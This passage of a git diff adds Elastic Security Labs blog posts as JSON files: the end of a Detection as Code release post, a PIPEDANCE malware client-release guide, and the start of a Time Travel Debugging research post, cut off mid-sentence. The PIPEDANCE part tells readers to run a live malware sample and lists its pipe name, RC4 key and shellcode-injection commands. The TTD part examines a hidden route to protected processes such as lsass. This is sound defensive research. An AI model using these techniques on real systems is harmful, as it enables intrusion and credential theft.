This allows users to easily move, unit test, and validate their rules in a single command using CI/CD pipelines.\n\n## Improving Process Maturity\n\n\n\nSecurity organizations face the same bottom line: we can’t rely on static out-of-the-box signatures. At its core, DaC is a methodology that applies software development practices to the creation and management of security detection rules, enabling automation, version control, testing, and collaboration in the development & deployment of security detections. Unit testing, peer review, and CI/CD enable software developers to be confident in their processes. These help catch errors and inefficiencies before they impact their customers. The same should be true in detection engineering. In that spirit, here are some examples of the new features we are supporting. See our [DaC Reference Guide](https://dac-reference.readthedocs.io/en/latest/) for complete documentation.\n\n### Bulk Import and Export of Custom Rules\n\nCustom rules can now be moved in bulk to and from Kibana using the ```kibana import-rules``` and ```kibana export-rules``` commands. Additionally, one can convert them in bulk between TOML and ndjson formats using the ```import-rules-to-repo``` and ```export-rules-from-repo``` commands. In addition to rules, these commands support moving exceptions and exception lists using the appropriate flag. The ndjson approach's benefit is that it allows engineers to manage and share a collection of rules in a single file (exported by the CLI or from Kibana), which is helpful when access to the other Elastic environment is not permitted. When moving rules using either of these methods, the rules pass through schema validation unless otherwise specified, to ensure that the rules contain the appropriate data fields. For more information on these commands, please see the [```CLI.md```](https://github.com/elastic/detection-rules/blob/DAC-feature/CLI.md) file in detection rules. 
\n\n### Configurable Unit Tests, Validation, and Schemas\n\nWith this new feature, we've now included the ability to configure the behavior of unit tests and schema validation using configuration files. In these files, you can now set specific tests to be bypassed, specify only specific tests to run, and likewise with schema validation against specific rules. You can run this validation and unit tests at any time by running ```make test```. Furthermore, you can now bring your schema (JSON file) to our validation process. You can also specify which schemas to use against which target versions of your Stack. For example, if you have custom schemas that only apply to rules in 8.14 while you have a different schema that should be used for 8.10, this can now be managed via a configuration file. For more information, please see our [example configuration file](https://github.com/elastic/detection-rules/blob/DAC-feature/detection_rules/etc/_config.yaml) or use our ```custom-rules setup-config``` command from the detection rules repo to generate an example for you.\n\n### Custom Version Control\n\nWe now are providing the ability to manage custom rules using the same version lock logic that Elastic’s internal team uses to manage our rules for release. This is done through a version lock file that checks the hash of the rule contents and determines whether or not they have changed. Additionally, we are providing a configuration option to disable this version lock file to allow users to use an alternative means of version control such as using a git repo directly. For more information please see the [version control section](https://dac-reference.readthedocs.io/en/latest/internals_of_the_detection_rules_repo.html#rule-versioning) of our documentation. Note that you can still rely on Kibana’s versioning fields.\n\nHaving these systems in place provides auditable evidence for maintaining security rules. 
Adopting some or all of these best practices can dramatically improve quality in maintaining and developing security rules.\n\n### Broader Adoption of Automation\n\nWhile quality is critical, security teams and organizations face growing rule sets to respond to an ever-expanding threat landscape. As such, it is just as crucial to reduce the strain on security analysts by providing rapid deployment and execution. For our repo, we have a single-stop shop where you can set your configuration, focus on rule development, and let the automation handle the rest. \n\n#### Lowering the Barrier to Entry\n\nTo start, simply clone or fork our detection rules repo, run ```custom-rules setup-config``` to generate an initial config, and import your rules. From here, you now have unit tests and validation ready for use. If you are using GitLab, you can quickly create CI/CD to push the latest rules to Kibana and run these tests. Here is an [example](https://dac-reference.readthedocs.io/en/latest/core_component_syncing_rules_and_data_from_vcs_to_elastic_security.html#option-1-push-on-merge) of what that could look like:\n\n\n\n### High Flexibility\n\nWhile we use GitHub CI/CD for managing our release actions, by no means are we prescribing that this is the only way to manage detection rules. Our CLI commands have no dependencies outside of their python requirements. Perhaps you have already started implementing some DaC practices, and you may be looking to take advantage of the Python libraries we provide. Whatever the case may be, we want to encourage you to try adopting DaC principles in your workflows and we would like to provide flexible tooling to accomplish these goals. \n\nTo illustrate an example, let’s say we have an organization that is already managing their own rules with a VCS and has built automation to move rules back and forth from deployment environments. 
However, they would like to augment these movements with testing based on telemetry which they are collecting and storing in a database. Our DaC features already provide custom unit testing classes that can run per rule. Realizing this goal may be as simple as forking the detection rules repo and writing a single unit test. The figure below shows an example of what this could look like. \n\n\n\nThis new unit test could utilize our unit test classes and rule loading to provide scaffolding to load rules from a file or Kibana instance. Next, one could create different integration tests against each rule ID to see if they pass the organization's desired results (e.g. does the rule identify the correct behaviors). If they do, the CI/CD tooling can proceed as originally planned. If they fail, one can use DaC tooling to move those rules to a “needs tuning” folder and/or upload those rules to a “Tuning” Kibana space. In this way, one could use a hybrid of our tooling and one's own tooling to keep an up to date Kibana space (or VCS controlled folder) of what rules require updates. As updates are made and issues addressed, they could also be continually synchronized across spaces, leading to a more cohesive environment.\n\nThis is just one idea of how one can take advantage of our new DaC features in your environment. In practice, there are a vast number of different ways they can be utilized.\n\n## In Practice\n\nNow, let’s take a look at how we can tie these new features together into a cohesive DaC strategy. As a reminder, this is not prescriptive. Rather, this should be thought of as an optional, introductory strategy that can be built on to achieve your DaC goals.\n\n### Establishing a DaC Baseline\n\nIn detection engineering, we would like collaboration to be a default rather than an exception. Detection Rules is a public repo precisely with this precept in mind. 
Now, it can become a basis for the community and teammates to not only collaborate with us, but also with each other. Let’s use the chart below as an example for what this could look like. \n\n\n\nReading from left to right, we have initial planning and prioritization and the subsequent threat research that drives the detection engineering. This process will look quite different for each user so we are not going to spend much time describing it here. However, the outcome will largely be similar: the creation of new detection rules. These could take various forms, such as Sigma rules (more in a later blog), Elastic TOML rule files, or rules created directly in Kibana. Regardless of format, once created these rules need to be staged. This would either occur in Kibana, your VCS, or both. From a DaC perspective, the goal is to sync the rules such that the process/automation are aware of these new additions. Furthermore, this provides the opportunity for peer review of these additions — the first stage of collaboration. \n\n\n\nThis will likely happen in your version control system; for instance, in GitHub one could use a PR with required approvals before merging back into a main branch that acts as the authoritative source of reviewed rules. The next step is testing and validation; this step could also occur before peer review, depending on the desired implementation. \n\n\n\nIn addition to any other internal release processes, by adhering to this workflow, we can reduce the risk of malformed rules and errant mistakes reaching both our customers and the community. Additionally, having the evidence artifacts, passing unit tests, schema validation, etc., inspires confidence and provides control for each user to choose what risks they are willing to accept. \n\nOnce deployed and distributed, rule performance can be monitored from Kibana. Updates to these rules can be made either directly from Kibana or through the VCS. 
This will largely be dependent on the implementation specifics, but in either case, these can be treated very similarly to new rules and pass through the same peer review, testing, and validation processes.\n\n\n\nAs shown in the figure above, this can provide a unified method for handling rule updates whether from the community, customers, or from internal feedback. Since the rules ultimately exist as version-controlled files, there is a dedicated format source of truth to merge and test against. \n\nIn addition to the process quality improvements, having authoritative known states can empower additional automation. As an example, different customers may require different testing or perhaps different data sources. Instead of having to parse the rules manually, we provide a unified configuration experience where users can simply bring their own config and schemas and be confident that their specific requirements are met. All of this can be managed automatically via CI/CD. With a fully automated DaC setup, one can take advantage of this system entirely from VCS and Kibana without needing to write additional code. Let’s take a look at an example of what this could look like. \n\n### Example\n\nFor this example, we are going to be acting as an organization that has 2 Kibana spaces they want to manage via DaC. The first is a development space that rule authors will be using to write detection rules (so let’s assume there are some preexisting rules already available). There will also be some developers that are writing detection rules directly in TOML file formats and adding them to our VCS, so we will need to manage synchronization of these. Additionally, this organization wants to enforce unit testing and schema validation with the option for peer review on rules that will be deployed to a production space in the same Kibana instance. 
Finally, the organization wants all of this to occur in an automated manner with no requirement to either clone detection rules locally or write rules outside of a GUI. \n\nIn order to accomplish this we will need to make use of a few of the new DaC features in detection rules and write some simple CI/CD workflows. In this example we are going to be using GitHub. Additionally, you can find a video walkthrough of this example [here](https://dac-reference.readthedocs.io/en/latest/etoe_reference_example.html#demo-video). As a note, if you wish to follow along you will need to fork the detection rules repo and create an initial configuration using our ```custom-rules setup-config``` command. Also for general step by step instructions on how to use the DAC features, see this [quickstart guide](https://dac-reference.readthedocs.io/en/latest/etoe_reference_example.html#quick-start-example-detection-rules-cli-commands), which has several example commands.\n\n#### Development Space Rule Synchronization\n\nFirst we are going to synchronize from Kibana -> GitHub (VCS). To do this we will be using the ```kibana import-rules``` and ```kibana export-rules``` detection rules commands. Additionally, in order to keep the rule versions synchronized we will be using the locked versions file as we are wanting both our VCS and Kibana to be able to overwrite each other with the latest versions. This is not required for this setup, either Kibana or GitHub (VCS) could be used authoritatively instead of the locked versions file. But we will be using it for convenience. \n\nThe first step is for us to make a manual dispatch trigger that will pull the latest rules from Kibana upon request. In our setup this could be done automatically; however, we want to give rule authors control for when they want to move their rules to the VCS as the development space in Kibana is actively used for development and the presence of a new rule does not necessarily mean the rule is ready for VCS. 
The manual dispatch section could look like the following [example](https://dac-reference.readthedocs.io/en/latest/core_component_syncing_rules_and_data_from_elastic_security_to_vcs.html#option-1-manual-dispatch-pull):\n\n\n\nWith this trigger in place, we can now write four additional jobs that will trigger on this workflow dispatch. \n\n 1. Pull the rules from the desired Kibana space. \n 2. Update the version lock file. \n 3. Create a PR for review to merge into the main branch in GitHub. \n 4. Set the correct target for the PR.\n\nThese jobs could look like the following, also from the same [example](https://dac-reference.readthedocs.io/en/latest/core_component_syncing_rules_and_data_from_elastic_security_to_vcs.html#option-1-manual-dispatch-pull):\n\n\n\nNow, once we run this workflow, we should expect to see a PR open with the new rules from the Kibana Dev space. We also need to synchronize rules from GitHub (VCS) to Kibana. For this, we will need to create a trigger on pull request:\n \n\n \nNext, we just need to create a job that uses the ```kibana import-rules``` command to push the rule files from the given PR to Kibana. See the second [example](https://dac-reference.readthedocs.io/en/latest/core_component_syncing_rules_and_data_from_vcs_to_elastic_security.html#option-1-push-on-merge) for the complete workflow file.\n\n\n\nWith these two workflows complete, we now have synchronization of rules between GitHub and the Kibana Dev space. \n\n### Production Space Deployment\n\nWith the Dev space synchronized, now we need to handle the prod space. As a reminder, for this we need to enforce unit testing, schema validation, available peer review for PRs to main, and an automatic push to the prod space on merge to main. To accomplish this we will need two workflow files. The first will run unit tests on all pull requests and pushes to versioned branches. The second will push the latest rules merged to main to the prod space in Kibana. \n\nThe first workflow file is very simple. 
It triggers on push and pull_request events, and its core job runs the ```test``` command shown below. See this [example](https://dac-reference.readthedocs.io/en/latest/core_component_syncing_rules_and_data_from_elastic_security_to_vcs.html#sub-component-3-optional-unit-testing-rules-via-ci-cd) for the full workflow.\n\n\n\nWith this ```test``` command, we perform unit tests and schema validation on all of our custom rules, with the parameters specified in our config files. Now we just need the workflow to push the latest rules to the prod space. The core of this workflow is the ```kibana import-rules``` command again, just using the prod space as the destination. However, there are a number of additional options provided to this workflow that are not necessary but nice to have in this example, such as options to overwrite and update exceptions/exception lists as well as rules. The core job is shown below. Please see [this example](https://dac-reference.readthedocs.io/en/latest/core_component_syncing_rules_and_data_from_vcs_to_elastic_security.html#option-1-push-on-merge) for the full workflow file.\n\n\n\nAnd there we have it: with those four workflow files, we have a synchronized development space with rules passing through unit testing and schema validation. We have the option for peer review through the use of pull requests, which can be made required in GitHub before allowing merges to main. On merge to main in GitHub, we also have an automated push to the Kibana prod space, establishing our baseline of rules that have passed our organization’s requirements and are ready for use. All of this was accomplished without writing additional Python code, just by using our new DaC features in GitHub workflows.\n\n## Conclusion\n\nNow that we’ve reached this milestone, you may be wondering what’s next? 
We’re planning to spend the next few cycles continuing to test edge cases and incorporating feedback from the community as part of our business-as-usual sprints. We also have a backlog of feature request considerations, so if you want to voice your opinion, check out the issues titled ```[FR][DAC] Consideration:``` or open a similar new issue if it’s not already recorded. This will help us prioritize the most important features for the community.\n \nWe’re always interested in hearing use cases and workflows like these, so as always, reach out to us via [GitHub issues](https://github.com/elastic/detection-rules/issues), chat with us in our [security-rules-dac](https://elasticstack.slack.com/archives/C06TE19EP09) Slack channel, and ask questions in our [Discuss forums](https://discuss.elastic.co/c/security/endpoint-security/80)!"
+ },
+ "title": "Now in beta: New Detection as Code capabilities",
+ "slug": "dac-beta-release",
+ "date": "2024-08-08",
+ "description": "",
+ "author": [
+ {
+ "slug": "mika-ayenson"
+ },
+ {
+ "slug": "eric-forte"
+ }
+ ],
+ "image": "Security Labs Images 18.jpg",
+ "category": [
+ {
+ "slug": "detection-science"
+ }
+ ]
+ },
+ "id": "security_labs_content-dac_beta_release-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-dancing_the_night_away_with_named_pipes-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-dancing_the_night_away_with_named_pipes-md.json
new file mode 100644
index 00000000000..3ea4e61af4c
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-dancing_the_night_away_with_named_pipes-md.json
@@ -0,0 +1,28 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Dancing the night away with named pipes - PIPEDANCE client release\"\nslug: \"dancing-the-night-away-with-named-pipes\"\ndate: \"2023-10-05\"\ndescription: \"In this publication, we will walk through this client application’s functionality and how to get started with the tool.\"\nauthor:\n - slug: daniel-stepanic\nimage: \"photo-edited-12@2x.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - pipedance\n - ref1326\n---\n\n## Introduction\n\nThis year at [VB2023](https://www.virusbulletin.com/conference/), a globally renowned malware conference, Daniel Stepanic of the Elastic Security Labs team presented new insights into PIPEDANCE – a malware we [disclosed](https://twitter.com/elasticseclabs/status/1630289166008287232) earlier this year. In addition to the talk, we released a [client](https://github.com/elastic/PIPEDANCE) application that enables threat research, offering learning opportunities for both offensive and defensive teams. In this publication, we will walk through this client application’s functionality and how to get started with the tool. Our goal with this research is to help defenders improve their understanding of PIPEDANCE by emulating techniques from this malware, used by a formidable threat group. This includes different behaviors such as:\n\n - Command and control communication through named pipes\n - Different styles of process injection \n - Performing network connectivity checks\n - System/network discovery and enumeration\n\n## Recap\n\nPIPEDANCE is a custom malware family used by a state-sponsored group to perform post-compromise activities. It's purpose-built to enable lateral movement, deploy additional implants, and perform reconnaissance functions. PIPEDANCE uses named pipes as its main channel for command and control communication. 
With a variety of unique features, we believe it’s a useful example to share for research purposes and can help defenders validate security tooling.\n\nFor a detailed analysis of the PIPEDANCE malware, check out our [previous research](https://www.elastic.co/security-labs/twice-around-the-dance-floor-with-pipedance).\n\n## Development\n\nTo get a better understanding of different features within malware, our team at Elastic Security Labs sometimes writes custom applications and controllers to interact with the malware or malware infrastructure. This process helps cultivate knowledge of a sample’s core features, assists in understanding the control flow better, and further validates different areas such as inputs and outputs to functions and data structures. Another key benefit is to uncover functionality that was not directly observed during an intrusion but is still contained in the malware. This allows our team to collect more intelligence, build additional detections, and understand more of the adversary’s objectives behind the malware. \n\nWhile we don't cover these exact scenarios in this publication, here are some things that you can do with the client (but you may think of others):\n\n - Understand how malware abuses named pipes\n - Verify data sources for security tooling around network activity using named pipes\n - Build a network decoder using PCAP data from PIPEDANCE’s communication requests\n\nWith the release of the client, we're hoping that the community can write additional PIPEDANCE clients in your favorite language and compare notes.\n\n\n\n\n## Getting Started\n\n_**Note:** Please review the [requirements](https://github.com/elastic/PIPEDANCE/blob/main/README.md#requirements) before setting up the lab environment. 
For this example, we will use two different endpoints in the same local network where named pipes, inter-process communication, and SMB settings are configured properly._\n\nThe first step is to download the PIPEDANCE [sample](https://malshare.com/sample.php?action=detail&hash=e5ae20ac5bc2f02a136c3cc3c0b457476d39f809f28a1c578cda994a83213887) (free [registration](https://malshare.com/register.php) required) and start the program without any arguments on one endpoint. This machine is the targeted endpoint where the adversary is interested in running additional implants and performing reconnaissance. After execution, a named pipe will be created and await an incoming connection from our client. \n\n```\n.\\e5ae20ac5bc2f02a136c3cc3c0b457476d39f809f28a1c578cda994a83213887\n```\n\nNow that PIPEDANCE is running on our targeted machine, download and compile the client files within the [repository](https://github.com/elastic/PIPEDANCE). The PIPEDANCE malware uses a hard-coded string, `u0hxc1q44vhhbj5oo4ohjieo8uh7ufxe`, that serves as the named pipe name and RC4 key.\n\n\n\n\nTake the newly compiled client program and execute it on a separate endpoint with one argument using either the target IP address or hostname of the machine running PIPEDANCE (machine from the previous step). An example of this would be: \n\n```\npipedance_client.exe 192.168.47.130\n```\n\nAfter execution, the client will check in with the PIPEDANCE victim to retrieve the PID of the malicious process, working directory, and user running the process. A menu of commands should be listed allowing the operator to perform various post-compromise activities.\n\n\n\n\nThe appendix below contains the functions and their supported arguments.\n\n## Conclusion\n\nAs part of our research investigating PIPEDANCE, we are releasing a client application that interacts with the malware. This tool can be used to evaluate existing security prevention/detection technologies as well as used for threat research purposes. 
Please check out our [repository](https://github.com/elastic/PIPEDANCE); it also includes a detection section with behavioral/YARA/hunting rules.\n\n## Appendix\n\n### Handler Commands\n\n| Command ID | Description | Arguments |\n|---|---|---|\n| 0 | Stop PIPEDANCE client | |\n| 1 | Terminate process by PID | PID (ex. 9867) |\n| 2 | Run shell command and print output | Command (ex. ipconfig) |\n| 4 | List files in current working directory | |\n| 6 | Write file to disk | Filename (full path), file content |\n| 7 | Get current working directory | |\n| 8 | Change current working directory | Folder path |\n| 9 | List running processes | |\n| 23 | Create random process with hijacked token from provided PID and inject shellcode (32-bit) | PID (token hijack), shellcode |\n| 24 | Create random process with hijacked token from provided PID and inject shellcode (64-bit) | PID (token hijack), shellcode |\n| 25 | Open process from provided PID and inject shellcode (32-bit) | PID (thread hijack), shellcode |\n| 26 | Open process from provided PID and inject shellcode (64-bit) | PID (thread hijack), shellcode |\n| 71 | HTTP connectivity check | Domain (ex. google.com) |\n| 72 | DNS connectivity check with provided DNS server IP | DNS server IP |\n| 73 | ICMP connectivity check | ICMP server IP |\n| 74 | TCP connectivity check | IP, port |\n| 75 | DNS connectivity check without DNS server | |\n| 99 | Disconnect pipe / exit thread | |\n| 100 | Terminate PIPEDANCE process / disconnect pipe / exit thread | |\n"
+ },
+ "title": "Dancing the night away with named pipes - PIPEDANCE client release",
+ "slug": "dancing-the-night-away-with-named-pipes",
+ "date": "2023-10-05",
+ "description": "In this publication, we will walk through this client application’s functionality and how to get started with the tool.",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ }
+ ],
+ "image": "photo-edited-12@2x.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "pipedance",
+ "ref1326"
+ ]
+ },
+ "id": "security_labs_content-dancing_the_night_away_with_named_pipes-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-deep_dive_into_the_ttd_ecosystem-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-deep_dive_into_the_ttd_ecosystem-md.json
new file mode 100644
index 00000000000..026e6094788
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-deep_dive_into_the_ttd_ecosystem-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Deep dive into the TTD ecosystem\"\nslug: \"deep-dive-into-the-ttd-ecosystem\"\ndate: \"2022-11-30\"\ndescription: \"This is the first in a series focused on the Time Travel Debugging (TTD) technology developed by Microsoft that was explored in detail during a recent independent research period.\"\nauthor:\n - slug: christophe-alladoum\nimage: \"photo-edited-02-w.jpg\"\ncategory:\n - slug: security-research\ntags:\n - windows\n---\n\nSeveral times a year, Elastic Security Labs researchers get the freedom to choose and dig into projects of their liking — either alone or as a team. This time is internally referred to as “On-Week” projects. This is the first in a series focused on the [Time Travel Debugging](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/time-travel-debugging-overview) (TTD) technology developed by Microsoft that was explored in detail during a recent On-Week session.\n\nDespite having been public for several years, TTD and its potential remain greatly underrated within the infosec community. We hope this two-part series can help shed some light on how TTD can be useful for program debugging, vulnerability research and exploitation, and malware analysis.\n\nThis research involved first understanding the inner workings of TTD and then assessing some of the interesting uses that can be made of it. This post will focus on how researchers dive deep into TTD, sharing their methodology along with some interesting findings. The second part will detail the applicable use of TTD for the purpose of malware analysis and integration with Elastic Security.\n\n# Background\n\n[Time Travel Debugging](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/time-travel-debugging-overview) is a tool developed by Microsoft Research that allows users to record execution and navigate freely into the user-mode runtime of a binary. 
TTD itself relies on two technologies: Nirvana for the binary translation, and iDNA for the trace reading/writing process. TTD has been available since Windows 7, and its internals were first detailed [in a publicly available paper](https://www.usenix.org/legacy/events/vee06/full_papers/p154-bhansali.pdf). Since then, both [Microsoft](https://www.youtube.com/watch?v=l1YJTg_A914&) and [independent researchers](https://infocondb.org/con/recon/recon-2015/hooking-nirvana-stealthy-instrumentation-techniques-for-windows-10) have covered it in great detail. For this reason, we won’t explore the internals of both technologies in depth. Instead, Elastic researchers investigated the ecosystem — or the executables, DLLs, and drivers — that make the TTD implementation work. This led to some interesting findings about TTD, but also about Windows itself, as TTD leverages some (undocumented) techniques to work as intended in special cases, such as [Protected Processes](https://docs.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-#system-protected-process).\n\nBut why investigate TTD at all? Aside from pure curiosity, one of the likely intended uses for the technology is discovering bugs in production environments. When bugs are hard to trigger or reproduce, having a “record-once-replay-always” type of environment helps compensate for that difficulty, which is exactly what TTD implements when coupled with WinDbg.\n\nDebugging tools such as [WinDbg](https://apps.microsoft.com/store/detail/9PGJGD53TN86) have always been an immense source of information when reversing Windows components, as they provide additional comprehensible information, usually in plain text. Debugging tools (especially debuggers) must cooperate with the underlying operating system, which could involve debugging interfaces and/or previously undisclosed capabilities from the OS. 
TTD conforms to that pattern.\n\n# High-level overview\n\nTTD works by first creating a recording that tracks every instruction executed by an application and stores it in a database (suffixed with .run). Recorded traces can be replayed at will using the WinDbg debugger, which on first access will index the .run file, allowing for faster navigation through the database. To track execution of arbitrary processes, TTD injects a DLL responsible for recording activity on demand, which allows it both to record processes it spawns and to attach to an already-running process.\n\nTTD is freely [downloadable](https://apps.microsoft.com/store/detail/9PGJGD53TN86) as part of the WinDbg Preview package in the MS Store. It can be used directly from WinDbg Preview (aka WinDbgX), but is a standalone component that is located in `C:\\Program Files\\WindowsApps\\Microsoft.WinDbg____8wekyb3d8bbwe\\amd64\\ttd` for the x64 architecture, which we will focus on in this post. x86 and arm64 versions are also available for download in the MS Store.\n\nThe package consists of two EXE files (TTD.exe and TTDInject.exe) and a handful of DLLs. This research focuses on the major DLL responsible for everything not related to Nirvana/iDNA (i.e. session management, driver communication, DLL injection, and more): ttdrecord.dll.\n\n\\_Note: Most of this research was done using two versions of the ttdrecord DLL: mostly a 2018 version (1.9.106.0 SHA256=aca1786a1f9c96bbe1ea9cef0810c4d164abbf2c80c9ecaf0a1ab91600da6630) and an early 2022 version (10.0.19041.1 SHA256=1FF7F54A4C865E4FBD63057D5127A73DA30248C1FF28B99FF1A43238071CBB5C). The older version was found to have more symbols, which helped speed up the reverse engineering process. We then re-adapted structures and function names to the most recent version. Therefore, some of the structures explained here might not be the same if you’re trying to reproduce on more recent versions. 
\\_\n\n# Examining TTD features\n\n## Command line parameters\n\nReaders should note that TTD.exe acts essentially as a wrapper to ttdrecord!ExecuteTTTracerCommandLine:\n\n```\nHRESULT wmain()\n{\n    v28 = 0xFFFFFFFFFFFFFFFEui64;\n    hRes = CoInitializeEx(0i64, 0);\n    if ( hRes >= 0 )\n    {\n        ModuleHandleW = GetModuleHandleW(L\"TTDRecord.dll\");\n        [...]\n        TTD::DiagnosticsSink::DiagnosticsSink(DiagnosticsSink, &v22);\n        CommandLineW = GetCommandLineW();\n        lpDiagnosticsSink = Microsoft::WRL::Details::Make(&v31, DiagnosticsSink);\n        hRes = ExecuteTTTracerCommandLine(*lpDiagnosticsSink, CommandLineW, 2i64);\n        [...]\n```\n\nThe final line of the code excerpt above shows a call to ExecuteTTTracerCommandLine, which takes an integer as the last argument. This argument corresponds to the desired tracing mode, which can be:\n\n- 0 -\> FullTracingMode\n- 1 -\> UnrestrictedTracing\n- 2 -\> Standalone (the hardcoded mode for the public version of TTD.exe)\n\nForcing TTD to run in full-tracing mode reveals available options, which include some hidden capabilities such as process reparenting (-parent) and automatic tracing until reboot (-onLaunch) for programs and services.\n\n[Dumping the complete option set](https://gist.github.com/calladoum-elastic/4666dafc789a273c35a4aedf2ed9cd9e) of TTDRecord.dll revealed interesting hidden command line options such as:\n\n```\n-persistent Trace programs or services each time they are started (forever). You must specify a full path to the output location with -out.\n-delete Stop future tracing of a program previously specified with -onLaunch or -persistent. Does not stop current tracing. For -plm apps you can only specify the package (-delete ) and all apps within that package will be removed from future tracing\n-initialize Manually initialize your system for tracing. 
You can trace without administrator privileges after the system is initialized.\n```\n\nThe process of setting up Nirvana requires TTD to set up the InstrumentationCallback field in the target \\_EPROCESS. This is achieved through the (undocumented but [known](https://www.codeproject.com/Articles/543542/Windows-x64-System-Service-Hooks-and-Advanced-Debu)) NtSetInformationProcess syscall with the ProcessInstrumentationCallback information class (which has a value of 40). Due to the potential security implications, invoking this syscall requires elevated privileges. Interestingly, the -initialize flag also hinted that TTD could be deployed as a Windows service. Such a service would be responsible for proxying tracing requests to arbitrary processes. This can be confirmed by executing it and seeing the resulting error message:\n\n\n\nEven though it [is easy](https://www.virustotal.com/gui/search/TTDService.exe/files) to find evidence confirming the existence of TTDService.exe, the file was not provided as part of the public package, so aside from noting that TTD can run as a service, we will not cover it in this post.\n\n## TTD process injection\n\nAs explained, a TTD trace file can be created either from the standalone binary TTD.exe or through a service, TTDService.exe (private), both of which must be run in a privileged context. However, those are just launchers; injecting the recording DLL (named TTDRecordCPU.dll) is the job of another process: TTDInject.exe.\n\nTTDInject.exe is another executable, noticeably larger than TTD.exe, but with a pretty simple objective: prepare the tracing session. In an overly simplified view, TTD.exe will first start the process to be recorded in a suspended state. It will then spawn TTDInject.exe, passing it all the necessary arguments to prepare the session. Note that TTDInject can also spawn the process directly depending on the tracing mode we mentioned earlier — therefore, we are describing the most common behavior (i.e. 
when spawned from TTD.exe).\n\n\n\nTTDInject will create a thread to execute TTDLoader!InjectThread in the recorded process, which after various validations will in turn load the library responsible for recording all process activity, TTDRecordCPU.dll.\n\n\n\nFrom that point onward, all instructions, memory accesses, exceptions triggered, or CPU states encountered during the execution will be recorded.\n\nOnce the general workflow of TTD was understood, it became clear that little to no manipulation is possible after the session initialization. Thus, further attention was paid to the arguments supported by ttdrecord.dll. Thanks to the C++ function name mangling scheme, a lot of critical information can be retrieved from the function names themselves, which makes analyzing the command line argument parser relatively simple. One interesting flag that was discovered was PplDebuggingToken. That flag is hidden and only available in Unrestricted Mode.\n\n\n\nThe existence of this flag immediately raised questions: TTD was first architected around Windows 7 and 8, and on Windows 8.1+ the concept of Protection Level was added to processes, dictating that a process can only open a handle to another process whose [Protection Level](https://www.elastic.co/blog/protecting-windows-protected-processes#Protected%20process%20light:%7E:text=a%20kernel%20driver.-,Protected%20process%20light,-) is equal or lower. It is a simple byte in the \\_EPROCESS structure in the kernel, and thus not directly modifiable from user mode.\n\n\n\nThe values of the Protection Level byte are well known and are summarized in the table below.\n\n\n\nThe Local Security Authority subsystem (lsass.exe) on Windows [can be configured](https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection) to run as Protected Process Light, which aims to limit the reach of an intruder who gains maximum privileges on a host. 
By acting at the kernel level, no user-mode process can open a handle to lsass, no matter how privileged.\n\n\n\nBut the PplDebuggingToken flag appears to suggest otherwise. If such a flag existed, it would be the dream of any pentester/red teamer: a (magic) token that would allow them to inject into protected processes and record them, dump their memory or more. The command line parser seems to imply that the content of the command flag is a mere wide-string. Could this be a PPL backdoor?\n\n### Chasing after the PPL debugging token\n\nReturning to ttdrecord.dll, the PplDebuggingToken command line option is parsed and stored in a context structure along with all of the options required to create the TTD session. The value can be traced down to several locations, with an interesting one being within TTD::InitializeForAttach, whose behavior is simplified in the following pseudo-code:\n\n```\nErrorCode TTD::InitializeForAttach(TtdSession *ctx)\n{\n [...]\n EnableDebugPrivilege(GetCurrentProcess()); // [1]\n HANDLE hProcess = OpenProcess(0x101040u, 0, ctx->dwProcessId);\n if(hProcess == INVALID_HANDLE_VALUE)\n {\n goto Exit;\n }\n [...]\n HMODULE ModuleHandleW = GetModuleHandleW(L\"crypt32.dll\");\n if ( ModuleHandleW )\n pfnCryptStringToBinaryW = GetProcAddress(ModuleHandleW, \"CryptStringToBinaryW\"); // [2]\n\n if ( ctx->ProcessDebugInformationLength ) // [3]\n {\nDecodedProcessInformationLength = ctx->ProcessDebugInformationLength;\nDecodedProcessInformation = std::vector(DecodedProcessInformationLength);\nwchar_t* b64PplDebuggingTokenArg = ctx->CmdLine_PplDebugToken;\nif ( *pfnCryptStringToBinaryW )\n{\n if( ERROR_SUCCESS == pfnCryptStringToBinaryW( // [4]\n b64PplDebuggingTokenArg,\n DecodedProcessInformationLength,\n CRYPT_STRING_BASE64,\n DecodedProcessInformation.get(),\n &DecodedProcessInformationLength,\n 0, 0))\n {\n Status = NtSetInformationProcess( // [5]\n NtGetCurrentProcess(),\n ProcessDebugAuthInformation,\n DecodedProcessInformation.get(),\n 
DecodedProcessInformationLength);\n }\n[...]\n```\n\nAfter enabling the SeDebugPrivilege flag for the current process ([1]) and obtaining a handle to the process to attach to, the function resolves crypt32!CryptStringToBinaryW, an exported generic string-manipulation function ([2]). In this instance, it is used for decoding the base64-encoded value of the PplDebuggingToken context option if it was provided by the command line ([3], [4]). The decoded value is then used to invoke the syscall NtSetInformationProcess(ProcessDebugAuthInformation) ([5]). The token doesn’t seem to be used anywhere else, which made us scrutinize that syscall.\n\nThe process information class ProcessDebugAuthInformation was added in [RS4](https://en.wikipedia.org/wiki/Windows_10_version_1803). A quick look at ntoskrnl shows that this syscall simply passes the buffer to CiSetInformationProcess located in ci.dll, which is the Code Integrity driver DLL. The buffer is then passed to ci!CiSetDebugAuthInformation with fully controlled arguments.\n\n\n\nThe following diagram summarizes at a high level where this happens in the execution flow of TTD.\n\n\n\nThe execution flow in CiSetDebugAuthInformation is simple enough: the buffer with the base64-decoded PplDebuggingToken and its length are passed as arguments for parsing and validation to ci!SbValidateAndParseDebugAuthToken. Should that validation succeed, and after some extra checks, a handle to the process performing the syscall (remember that we’re still handling the syscall nt!NtSetInformationProcess) will be inserted in a process debug information object, then stored in a global list entry.\n\n\n\nBut how is that interesting? Because this list is only 